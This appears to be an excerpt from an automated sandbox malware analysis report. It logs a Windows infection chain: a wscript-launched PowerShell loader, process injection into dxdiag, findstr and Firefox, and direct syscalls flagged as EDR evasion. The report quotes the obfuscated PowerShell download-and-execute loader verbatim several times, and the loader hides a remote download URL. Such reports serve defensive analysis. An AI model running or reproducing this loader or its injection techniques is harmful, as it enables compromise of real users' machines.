              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\dxdiag.exeJump to behavior
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_7436.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7436, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4344, type: MEMORYSTR
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtCreateFile: Direct from: 0x77752FECJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtOpenFile: Direct from: 0x77752DCCJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtSetInformationThread: Direct from: 0x777463F9Jump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtQueryInformationToken: Direct from: 0x77752CACJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtProtectVirtualMemory: Direct from: 0x77752F9CJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtSetInformationProcess: Direct from: 0x77752C5CJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtTerminateProcess: Direct from: 0x77752D5CJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtNotifyChangeKey: Direct from: 0x77753C2CJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtOpenKeyEx: Direct from: 0x77752B9CJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtOpenSection: Direct from: 0x77752E0CJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtAllocateVirtualMemory: Direct from: 0x777548ECJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtQueryVolumeInformationFile: Direct from: 0x77752F2CJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtQuerySystemInformation: Direct from: 0x777548CCJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtAllocateVirtualMemory: Direct from: 0x77752BECJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtDeviceIoControlFile: Direct from: 0x77752AECJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtCreateUserProcess: Direct from: 0x7775371CJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtWriteVirtualMemory: Direct from: 0x7775490CJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtQueryInformationProcess: Direct from: 0x77752C26Jump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtResumeThread: Direct from: 0x77752FBCJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtReadVirtualMemory: Direct from: 0x77752E8CJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtCreateKey: Direct from: 0x77752C6CJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtSetInformationThread: Direct from: 0x77752B4CJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtQueryAttributesFile: Direct from: 0x77752E6CJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtAllocateVirtualMemory: Direct from: 0x77753C9CJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtClose: Direct from: 0x77752B6C
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtCreateMutant: Direct from: 0x777535CCJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtWriteVirtualMemory: Direct from: 0x77752E3CJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtMapViewOfSection: Direct from: 0x77752D1CJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtResumeThread: Direct from: 0x777536ACJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtReadFile: Direct from: 0x77752ADCJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtQuerySystemInformation: Direct from: 0x77752DFCJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtDelayExecution: Direct from: 0x77752DDCJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeNtAllocateVirtualMemory: Direct from: 0x77752BFCJump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: NULL target: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeSection loaded: NULL target: C:\Windows\SysWOW64\dxdiag.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeSection loaded: NULL target: C:\Windows\SysWOW64\findstr.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\SysWOW64\findstr.exeThread register set: target process: 336Jump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\dxdiag.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 3220000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Unutterability;function Bldagtigeres($Gravic){ .($Semidocumentary) ($Gravic)} function Sinterens($Efemerisk){$Jordspekulationens=4;do{$Velhavers+=$Efemerisk[$Jordspekulationens];$Jordspekulationens+=5;$Relatch=Format-List} until(!$Efemerisk[$Jordspekulationens])$Velhavers}$Feltundersgelses=Sinterens 'D fenTvise .hlT V r. Minw';$Feltundersgelses+=Sinterens 'Ca,sEUnpeBKontcIndeL,iquI ProEBibuNEnact';$forlngerledningen=Sinterens 'SproMabeloNicyz MotiVelol DaclClavaKbyt/';$Eelware=Sinterens 'EjedTStoplEtissMes,1a,di2';$Caplock='Unde[ achntilsESpalTTeak.BrinS PomeU skRManuV S miBo lCPr seEda P b iOSu eIPotaNUdsttclosm TabABe aNForfaRe dgXrayEfootRT.ss]Kata: Cac:Ac.psAan E FicCH lpuIngeRMichIPredTDetryGalaPAtler SproFindTLumbOBaancT.neOAfsplPelm= hel$MetaEHonoE O hlExubwSmaaAaffor,fveE';$forlngerledningen+=Sinterens ' ryo5Pyth. gri0 Ban ul(QuinWCosmiRig nR add.denoDaysw .ocsRead PeroNBroaTAm.n Sem1Ande0Stee.Parm0 Ont; orm KrusWF ntib evn ont6Nupp4Harv;Over HealxDumb6Fed 4outs;rein S,perIniqvBeca:Port1Solo3arri4Brak.Unpe0 F r)Unsm SvanG.llieZooicRep ke plo Pl./Secu2Kata0Audi1Bedd0Dend0 aab1Unus0Min.1Over GrilFhu tiUnderUsureoutefViceostadx.etr/Preo1 Bde3Estl4regn.In d0';$Paabegyndelsers=Sinterens 'Ce tUFabuSTeolE ameRSmaa-RetoAcompg DyseGylln ArkT';$Fibromyxosarcoma=Sinterens 'Tuneh Bl,t P ctCincpChansk nt: Bek/Unco/ UnidEmu.r MatiberavDisue ,fk. SucgDislo TogoPalig MaalBr.wejo,d.WroucFrivoUnjemVedt/Bogsu MelcUdmu?UforeSpejx rsep e,eoluger.strt ivs=BenedPar,oChe w NonnGladlM,sioSp oaUniddBorr&H xai ntedUnmi=Tsum1 ps GIr d7 SweZSa.lLNonqO RanAH bk9 UdbQA coZ NeuG F r5F,si-SandnAcrav Gr AAmebw Haltblaa0 dsabS alW eprXFerl8 B,fi IcoeMaalrGipsl,sop9,linM TimRvan,hTamigTantq';$Stenografere=Sinterens 'Gyn >';$Semidocumentary=Sinterens 'SmreI ConEElskX';$Hypermetamorphotic='Drklokke';$dirigentklokkernes='\Beflingens.Com';Bldagtigeres (Sinterens 'Drif$St mGModpLUntho.ismB StoAPjasLSub :Be eASuprf UndKCru rSla f,rmltUnareRockREmne= gte$Te,eeEmptnjuleV Co :Cat a .plp D,rPSa nD IntA rteTRuffAF nn+Hj d$I dfDFreiIT,otRUnsuI MongArvee mpln AretVe sk onLPugiObipekCarbkha,ve redRCalons ntEUdarS');Bldagtigeres (Sinterens ' Ist$r,paGExchlveneOButcbHe tA HysLHamm:VeteuJordDD safInaulsynge ndutKo tnerg.IBlovnEle.GPublEB.kkrStvlNT,ktESto =Big.$BookfRetsiFluoB InsR PleOFeltMforsY N,nx FacO VmsS Erha.ecirCompCFleto RanmMan a fo .Bit,sOverPMicrLCam.IUngdTDat (Non.$Gld SAlabT CumeInteN AftOEmfagDrejrh.emaChirF Gr Et.ttRT.acESy,u)');Bldagtigeres (Sinterens $Caplock);$Fibromyxosarcoma=$Udfletningerne[0];$Kumiss=(Sinterens ' ice$MbleGUdspLO enONon,B BriASerpLp ym: rbeK VagNCol,UB.ceS YelE sidL S rsHabikUnf eAnisn EmidGasdESvrvsBygn= Ba nbdleE S nWChei- B oO MolbN.alJLumbEUnr.CPapdtUmed F stsSpicyE ots,rget Tr EPalem Spl.Bic.$Cen fEnvieGrosl HaltSkudUTracnStegDUtt,eUnalRPseusSubrg TyneNe rl MaaSHalvEGanos');Bldagtigeres ($Kumiss);Bldagtigeres (Sinterens 'Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeProcess created: C:\Windows\SysWOW64\poqexec.exe "C:\Windows\SysWOW64\poqexec.exe"Jump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $unutterability;function bldagtigeres($gravic){ .($semidocumentary) ($gravic)} function sinterens($efemerisk){$jordspekulationens=4;do{$velhavers+=$efemerisk[$jordspekulationens];$jordspekulationens+=5;$relatch=format-list} until(!$efemerisk[$jordspekulationens])$velhavers}$feltundersgelses=sinterens 'd fentvise .hlt v r. minw';$feltundersgelses+=sinterens 'ca,seunpebkontcindel,iqui proebibunenact';$forlngerledningen=sinterens 'spromabelonicyz motivelol daclclavakbyt/';$eelware=sinterens 'ejedtstopletissmes,1a,di2';$caplock='unde[ achntilsespaltteak.brins pomeu skrmanuv s mibo lcpr seeda p b iosu eipotanudsttclosm tababe anforfare dgxrayefootrt.ss]kata: cac:ac.psaan e ficch lpuingermichipredtdetrygalapatler sprofindtlumbobaanct.neoafsplpelm= hel$metaehonoe o hlexubwsmaaaaffor,fvee';$forlngerledningen+=sinterens ' ryo5pyth. gri0 ban ul(quinwcosmirig nr add.denodaysw .ocsread peronbroatam.n sem1ande0stee.parm0 ont; orm kruswf ntib evn ont6nupp4harv;over healxdumb6fed 4outs;rein s,periniqvbeca:port1solo3arri4brak.unpe0 f r)unsm svang.lliezooicrep ke plo pl./secu2kata0audi1bedd0dend0 aab1unus0min.1over grilfhu tiunderusureoutefviceostadx.etr/preo1 bde3estl4regn.in d0';$paabegyndelsers=sinterens 'ce tufabusteole amersmaa-retoacompg dysegylln arkt';$fibromyxosarcoma=sinterens 'tuneh bl,t p ctcincpchansk nt: bek/unco/ unidemu.r matiberavdisue ,fk. sucgdislo togopalig maalbr.wejo,d.wroucfrivounjemvedt/bogsu melcudmu?uforespejx rsep e,eoluger.strt ivs=benedpar,oche w nonngladlm,siosp oauniddborr&h xai ntedunmi=tsum1 ps gir d7 swezsa.llnonqo ranah bk9 udbqa coz neug f r5f,si-sandnacrav gr aamebw haltblaa0 dsabs alw eprxferl8 b,fi icoemaalrgipsl,sop9,linm timrvan,htamigtantq';$stenografere=sinterens 'gyn >';$semidocumentary=sinterens 'smrei coneelskx';$hypermetamorphotic='drklokke';$dirigentklokkernes='\beflingens.com';bldagtigeres (sinterens 'drif$st mgmodpluntho.ismb stoapjaslsub :be easuprf undkcru rsla f,rmltunarerockremne= gte$te,eeemptnjulev co :cat a .plp d,rpsa nd inta rtetruffaf nn+hj d$i dfdfreiit,otrunsui mongarvee mpln aretve sk onlpugiobipekcarbkha,ve redrcalons nteudars');bldagtigeres (sinterens ' ist$r,pagexchlveneobutcbhe ta hyslhamm:veteujorddd safinaulsynge ndutko tnerg.iblovnele.gpubleb.kkrstvlnt,ktesto =big.$bookfretsifluob insr pleofeltmforsy n,nx faco vmss erha.ecircompcfleto ranmman a fo .bit,soverpmicrlcam.iungdtdat (non.$gld salabt cumeinten aftoemfagdrejrh.emachirf gr et.ttrt.acesy,u)');bldagtigeres (sinterens $caplock);$fibromyxosarcoma=$udfletningerne[0];$kumiss=(sinterens ' ice$mblegudsplo enonon,b briaserplp ym: rbek vagncol,ub.ces yele sidl s rshabikunf eanisn emidgasdesvrvsbygn= ba nbdlee s nwchei- b oo molbn.aljlumbeunr.cpapdtumed f stsspicye ots,rget tr epalem spl.bic.$cen fenviegrosl haltskudutracnstegdutt,eunalrpseussubrg tynene rl maashalveganos');bldagtigeres ($kumiss);bldagtigeres (sinterens '
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $unutterability;function bldagtigeres($gravic){ .($semidocumentary) ($gravic)} function sinterens($efemerisk){$jordspekulationens=4;do{$velhavers+=$efemerisk[$jordspekulationens];$jordspekulationens+=5;$relatch=format-list} until(!$efemerisk[$jordspekulationens])$velhavers}$feltundersgelses=sinterens 'd fentvise .hlt v r. minw';$feltundersgelses+=sinterens 'ca,seunpebkontcindel,iqui proebibunenact';$forlngerledningen=sinterens 'spromabelonicyz motivelol daclclavakbyt/';$eelware=sinterens 'ejedtstopletissmes,1a,di2';$caplock='unde[ achntilsespaltteak.brins pomeu skrmanuv s mibo lcpr seeda p b iosu eipotanudsttclosm tababe anforfare dgxrayefootrt.ss]kata: cac:ac.psaan e ficch lpuingermichipredtdetrygalapatler sprofindtlumbobaanct.neoafsplpelm= hel$metaehonoe o hlexubwsmaaaaffor,fvee';$forlngerledningen+=sinterens ' ryo5pyth. gri0 ban ul(quinwcosmirig nr add.denodaysw .ocsread peronbroatam.n sem1ande0stee.parm0 ont; orm kruswf ntib evn ont6nupp4harv;over healxdumb6fed 4outs;rein s,periniqvbeca:port1solo3arri4brak.unpe0 f r)unsm svang.lliezooicrep ke plo pl./secu2kata0audi1bedd0dend0 aab1unus0min.1over grilfhu tiunderusureoutefviceostadx.etr/preo1 bde3estl4regn.in d0';$paabegyndelsers=sinterens 'ce tufabusteole amersmaa-retoacompg dysegylln arkt';$fibromyxosarcoma=sinterens 'tuneh bl,t p ctcincpchansk nt: bek/unco/ unidemu.r matiberavdisue ,fk. sucgdislo togopalig maalbr.wejo,d.wroucfrivounjemvedt/bogsu melcudmu?uforespejx rsep e,eoluger.strt ivs=benedpar,oche w nonngladlm,siosp oauniddborr&h xai ntedunmi=tsum1 ps gir d7 swezsa.llnonqo ranah bk9 udbqa coz neug f r5f,si-sandnacrav gr aamebw haltblaa0 dsabs alw eprxferl8 b,fi icoemaalrgipsl,sop9,linm timrvan,htamigtantq';$stenografere=sinterens 'gyn >';$semidocumentary=sinterens 'smrei coneelskx';$hypermetamorphotic='drklokke';$dirigentklokkernes='\beflingens.com';bldagtigeres (sinterens 'drif$st mgmodpluntho.ismb stoapjaslsub :be easuprf undkcru rsla f,rmltunarerockremne= gte$te,eeemptnjulev co :cat a .plp d,rpsa nd inta rtetruffaf nn+hj d$i dfdfreiit,otrunsui mongarvee mpln aretve sk onlpugiobipekcarbkha,ve redrcalons nteudars');bldagtigeres (sinterens ' ist$r,pagexchlveneobutcbhe ta hyslhamm:veteujorddd safinaulsynge ndutko tnerg.iblovnele.gpubleb.kkrstvlnt,ktesto =big.$bookfretsifluob insr pleofeltmforsy n,nx faco vmss erha.ecircompcfleto ranmman a fo .bit,soverpmicrlcam.iungdtdat (non.$gld salabt cumeinten aftoemfagdrejrh.emachirf gr et.ttrt.acesy,u)');bldagtigeres (sinterens $caplock);$fibromyxosarcoma=$udfletningerne[0];$kumiss=(sinterens ' ice$mblegudsplo enonon,b briaserplp ym: rbek vagncol,ub.ces yele sidl s rshabikunf eanisn emidgasdesvrvsbygn= ba nbdlee s nwchei- b oo molbn.aljlumbeunr.cpapdtumed f stsspicye ots,rget tr epalem spl.bic.$cen fenviegrosl haltskudutracnstegdutt,eunalrpseussubrg tynene rl maashalveganos');bldagtigeres ($kumiss);bldagtigeres (sinterens '
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $unutterability;function bldagtigeres($gravic){ .($semidocumentary) ($gravic)} function sinterens($efemerisk){$jordspekulationens=4;do{$velhavers+=$efemerisk[$jordspekulationens];$jordspekulationens+=5;$relatch=format-list} until(!$efemerisk[$jordspekulationens])$velhavers}$feltundersgelses=sinterens 'd fentvise .hlt v r. minw';$feltundersgelses+=sinterens 'ca,seunpebkontcindel,iqui proebibunenact';$forlngerledningen=sinterens 'spromabelonicyz motivelol daclclavakbyt/';$eelware=sinterens 'ejedtstopletissmes,1a,di2';$caplock='unde[ achntilsespaltteak.brins pomeu skrmanuv s mibo lcpr seeda p b iosu eipotanudsttclosm tababe anforfare dgxrayefootrt.ss]kata: cac:ac.psaan e ficch lpuingermichipredtdetrygalapatler sprofindtlumbobaanct.neoafsplpelm= hel$metaehonoe o hlexubwsmaaaaffor,fvee';$forlngerledningen+=sinterens ' ryo5pyth. gri0 ban ul(quinwcosmirig nr add.denodaysw .ocsread peronbroatam.n sem1ande0stee.parm0 ont; orm kruswf ntib evn ont6nupp4harv;over healxdumb6fed 4outs;rein s,periniqvbeca:port1solo3arri4brak.unpe0 f r)unsm svang.lliezooicrep ke plo pl./secu2kata0audi1bedd0dend0 aab1unus0min.1over grilfhu tiunderusureoutefviceostadx.etr/preo1 bde3estl4regn.in d0';$paabegyndelsers=sinterens 'ce tufabusteole amersmaa-retoacompg dysegylln arkt';$fibromyxosarcoma=sinterens 'tuneh bl,t p ctcincpchansk nt: bek/unco/ unidemu.r matiberavdisue ,fk. sucgdislo togopalig maalbr.wejo,d.wroucfrivounjemvedt/bogsu melcudmu?uforespejx rsep e,eoluger.strt ivs=benedpar,oche w nonngladlm,siosp oauniddborr&h xai ntedunmi=tsum1 ps gir d7 swezsa.llnonqo ranah bk9 udbqa coz neug f r5f,si-sandnacrav gr aamebw haltblaa0 dsabs alw eprxferl8 b,fi icoemaalrgipsl,sop9,linm timrvan,htamigtantq';$stenografere=sinterens 'gyn >';$semidocumentary=sinterens 'smrei coneelskx';$hypermetamorphotic='drklokke';$dirigentklokkernes='\beflingens.com';bldagtigeres (sinterens 'drif$st mgmodpluntho.ismb stoapjaslsub :be easuprf undkcru rsla f,rmltunarerockremne= gte$te,eeemptnjulev co :cat a .plp d,rpsa nd inta rtetruffaf nn+hj d$i dfdfreiit,otrunsui mongarvee mpln aretve sk onlpugiobipekcarbkha,ve redrcalons nteudars');bldagtigeres (sinterens ' ist$r,pagexchlveneobutcbhe ta hyslhamm:veteujorddd safinaulsynge ndutko tnerg.iblovnele.gpubleb.kkrstvlnt,ktesto =big.$bookfretsifluob insr pleofeltmforsy n,nx faco vmss erha.ecircompcfleto ranmman a fo .bit,soverpmicrlcam.iungdtdat (non.$gld salabt cumeinten aftoemfagdrejrh.emachirf gr et.ttrt.acesy,u)');bldagtigeres (sinterens $caplock);$fibromyxosarcoma=$udfletningerne[0];$kumiss=(sinterens ' ice$mblegudsplo enonon,b briaserplp ym: rbek vagncol,ub.ces yele sidl s rshabikunf eanisn emidgasdesvrvsbygn= ba nbdlee s nwchei- b oo molbn.aljlumbeunr.cpapdtumed f stsspicye ots,rget tr epalem spl.bic.$cen fenviegrosl haltskudutracnstegdutt,eunalrpseussubrg tynene rl maashalveganos');bldagtigeres ($kumiss);bldagtigeres (sinterens 'Jump to behavior
              Source: FUrHThL4lQ4AVjnAsevEg.exe, 0000001C.00000002.2466268996.00000000012A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: XProgram Manager
